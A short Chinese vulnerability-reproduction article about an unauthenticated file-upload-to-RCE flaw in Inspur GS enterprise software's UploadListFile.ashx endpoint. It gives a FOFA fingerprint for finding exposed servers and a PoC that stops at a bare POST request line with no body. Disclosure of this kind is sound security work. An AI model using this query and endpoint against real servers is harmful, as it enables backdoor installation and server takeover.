本文主要是介绍浪潮GS企业管理软件 UploadListFile 文件上传致RCE漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
浪潮GS企业管理软件产品是一款面向大中型集团企业的全面解决方案,它基于Microsoft.NET技术路线和SOA(面向服务的架构),采用SOA架构和先进开放的GSP应用中间件开发,支持Web服务和Xml进行远程通信及数据交换。旨在帮助大中型集团企业实现资源整合、流程优化和智能决策,提升管理水平和竞争力。
0x02 漏洞概述
浪潮GS企业管理软件 UploadListFile接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
0x03 复现环境
FOFA:
body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524"
0x04 漏洞复现
PoC
POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=
这篇关于浪潮GS企业管理软件 UploadListFile 文件上传致RCE漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!